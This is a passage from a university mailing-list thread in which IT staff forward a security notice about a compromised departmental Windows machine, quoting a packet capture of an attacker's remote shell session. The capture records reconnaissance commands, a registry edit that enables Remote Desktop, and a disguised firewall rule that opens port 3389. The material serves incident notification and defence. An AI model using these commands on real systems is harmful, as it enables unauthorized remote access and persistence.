> > 188.132.176.26:4000 [AP]
> > Microsoft Windows [Version 6.1.7601]
> >
> > T 2017/01/18 02:45:55.448211 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:45:55.448772 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > .
> > Copyright (c) 2009 Microsoft Corporation. All rights reserved..
> > .
> > C:\ProgramData\MySQL\MySQL Server 5.5\data>
> >
> > T 2017/01/18 02:45:55.776319 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:46:19.130812 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [AP]
> > ipconfig
> >
> >
> > T 2017/01/18 02:46:19.131472 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > ipconfig
> >
> >
> > T 2017/01/18 02:46:19.304083 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [A]
> > .
> > Windows IP Configuration.
> > .
> > .
> > Ethernet adapter Local Area Connection:.
> > .
> > Connection-specific DNS Suffix . : cs.ucsb.edu.
> > IPv4 Address. . . . . . . . . . . : 128.111.28.118.
> > Subnet Mask . . . . . . . . . . . : 255.255.255.192.
> > Default Gateway . . . . . . . . . : 128.111.28.65.
> > .
> > Ethernet adapter Local Area Connection 2:.
> > .
> > Connection-specific DNS Suffix . : .
> > IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4::1.
> > Link-local IPv6 Address . . . . . : fe80::b57a:afce:a5c3:9380%15.
> > IPv4 Address. . . . . . . . . . . : 10.37.130.2.
> > Subnet Mask . . . . . . . . . . . : 255.255.255.0.
> > Default Gateway . . . . . . . . . : .
> > .
> > Ethernet adapter Local Area Connection 2:.
> > .
> > Connection-specific DNS Suffix . : .
> > IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4:1::1.
> > Link-local IPv6 Address . . . . . : fe80::c9a9:464b:1f35:e7b3%17.
> > IPv4 Address. . . . . . . . . . . : 10.37.131.2.
> > Subnet Mask . . . . . . . . . . . : 255.255.255.0.
> > Default Gateway . . . . . . . . . : .
> > .
> > Tunnel adapter isatap.cs.ucsb.edu:.
> > .
> > Media State . . . . . . . . . . . : Media disconnected.
> > Connection-specific DNS Suffix . : cs.ucsb.edu.
> > .
> > Tunnel adapter isatap.{49BB9C41-C060-433B-BF91-9F104E841F11}:.
> > .
> > Media State . . . . . . . . . . . : Media disconnected.
> > Connection-specific DNS Suffix . : .
> > .
> > Tunnel adapter Local Area Connection* 11:.
> > .
> > Media State . . . . . . . . . . . : Media disconnected.
> > Connection-spec
> >
> > T 2017/01/18 02:46:19.304089 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > ific DNS Suffix . : .
> >
> >
> > T 2017/01/18 02:46:19.500202 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:46:19.500764 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > .
> > Tunnel adapter isatap.{EB59D303-0C84-4EF4-842B-01A57D775715}:.
> > .
> > Media State . . . . . . . . . . . : Media disconnected.
> > Connection-specific DNS Suffix . : .
> > .
> > C:\ProgramData\MySQL\MySQL Server 5.5\data>
> >
> > T 2017/01/18 02:46:19.696722 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:46:44.733187 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [AP]
> > reg.exe ADD
> > "HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal
> > Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
> >
> >
> > T 2017/01/18 02:46:44.733944 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > reg.exe ADD
> > "HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal
> > Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
> >
> >
> > T 2017/01/18 02:46:45.104427 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:46:45.104905 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > The operation completed successfully...
> > .
> > C:\ProgramData\MySQL\MySQL Server 5.5\data>
> >
> > T 2017/01/18 02:46:45.432785 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:46:56.087756 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [AP]
> > netsh advfirewall firewall add rule name = "Windows Service Host"
> > dir=in action=allow protocol=TCP localport=3389
> >
> >
> > T 2017/01/18 02:46:56.088487 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > netsh advfirewall firewall add rule name = "Windows Service Host"
> > dir=in action=allow protocol=TCP localport=3389
> >
> >
> > T 2017/01/18 02:46:56.596211 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:46:59.117911 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > Ok..
> > .
> >
> > T 2017/01/18 02:46:59.432046 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:46:59.432624 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > .
> > .
> > C:\ProgramData\MySQL\MySQL Server 5.5\data>
> >
> > T 2017/01/18 02:46:59.761298 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:47:16.188439 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [AP]
> > net start
> >
> >
> > T 2017/01/18 02:47:16.189037 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > net start
> >
> >
> > T 2017/01/18 02:47:16.385997 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:47:16.427758 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > These Windows services are started:.
> >
> >
> > T 2017/01/18 02:47:16.428404 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [A]
> > .
> > Adobe Acrobat Update Service.
> > AMD External Events Utility.
> > Apple Mobile Device.
> > Application Experience.
> > Application Information.
> > Background Intelligent Transfer Service.
> > Base Filtering Engine.
> > Bonjour Service.
> > Certificate Propagation.
> > COM+ Event System.
> > Computer Browser.
> > Credential Manager.
> > Cryptographic Services.
> > DCOM Server Process Launcher.
> > Desktop Window Manager Session Manager.
> > DHCP Client.
> > Diagnostic Policy Service.
> > Diagnostic Service Host.
> > Diagnostics Tracking Service.
> > Distributed Link Tracking Client.
> > DNS Client.
> > Function Discovery Provider Host.
> > Function Discovery Resource Publication.
> > Group Policy Client.
> > Human Interface Device Access.
> > IKE and AuthIP IPsec Keying Modules.
> > IP Helper.
> > iPod Service.
> > IPsec Policy Agent.
> > LMIGuardianSvc.
> > LogMeIn.
> > LogMeIn Maintenance Service.
> > Microsoft Antimalware Service.
> > Microsoft Network Inspection.
> > Microsoft Office Click-to-Run Service.
> > MT7 Registry Service.
> > MT7 Serial Search Service.
> > MySQL55.
> > Network Connections.
> > Network List Service.
> > Network Location Awareness.
> > Network Store Interface Service.
> > Office Software Protection Platform.
> > Offline Files.
> > Parallels Networking Service.
> > Parallels Virtualization Service.
> > Plug and Play.
> > Pml Driver HPZ12.
> > PnP-X IP Bus Enumerator.
> > Portable Device Enumerator Service.
> > Power.
> > Print Spooler.
> > Program Compati
> >
> > T 2017/01/18 02:47:16.428408 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > bility Assistant Service
> >
> > T 2017/01/18 02:47:16.625665 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:47:16.626533 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > .
> > Quality Windows Audio Video Experience.
> > Remote Access Connection Manager.
> > Remote Desktop Configuration.
> > Remote Desktop Services.
> > Remote Desktop Services UserMode Port Redirector.
> > Remote Procedure Call (RPC).
> > Routing and Remote Access.
> > RPC Endpoint Mapper.
> > Secondary Logon.
> > Secure Socket Tunneling Protocol Service.
> > Security Accounts Manager.
> > Security Center.
> > Server.
> > Shell Hardware Detection.
> > Skype C2C Service.
> > SQL Server (SQLEXPRESS).
> > SQL Server VSS Writer.
> > SSDP Discovery.
> > Superfetch.
> > System Event Notification Service.
> > Tablet PC Input Service.
> > TabletServicePen.
> > Task Scheduler.
> > TCP/IP NetBIOS Helper.
> > TeamViewer 11.
> > Telephony.
> > Themes.
> > UPnP Device Host.
> > User Profile Service.
> > Wacom Consumer Touch Service.
> > Windows App Certification Kit Fast User Switching Utility Service.
> > Windows Audio.
> > Windows Audio Endpoint Builder.
> > Windows Driver Foundation - User-mode Driver Framework.
> > Windows Event Log.
> > Windows Firewall.
> > Windows Font Cache Service.
> > Windows Image Acquisition (WIA).
> > Windows Management Instrumentation.
> > Windows Media Player Network Sharing Service.
> > Windows Presentation Foundation Font Cache 3.0.0.0.
> > Windows Search.
> > Windows Update.
> > WinHTTP Web Proxy Auto-Discovery Service.
> > Workstation.
> > .
> > The command completed successfully..
> > .
> > .
> > C:\ProgramData\MySQL\MySQL Server 5.5\data>
> >
> > ----------sample----------
> > --
> > E. Todd Atkins
> > Enterprise Technology Services
> > University of California, Santa Barbara http://www.security.ucsb.edu/
> >
> > **********************************************************************
> > The NOC's list of network contacts is used to determine who should
> > receive email such as this. Please direct any requests for changes to
> > this list of network contacts to noc at ucsb.edu.
> > **********************************************************************
> >
>
>
> --
>
> Scott Kasai
> User Support Specialist
> Engineering Computing Infrastructure
> University of California, Santa Barbara
>
>
>
>
>
> _______________________________________________
> Ilab-users mailing list
> Ilab-users at lists.cs.ucsb.edu
> https://lists.cs.ucsb.edu/mailman/listinfo/ilab-users
>
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.cs.ucsb.edu/pipermail/ilab-users/attachments/20170120/fcb73299/attachment-0001.html>

More information about the Ilab-users mailing list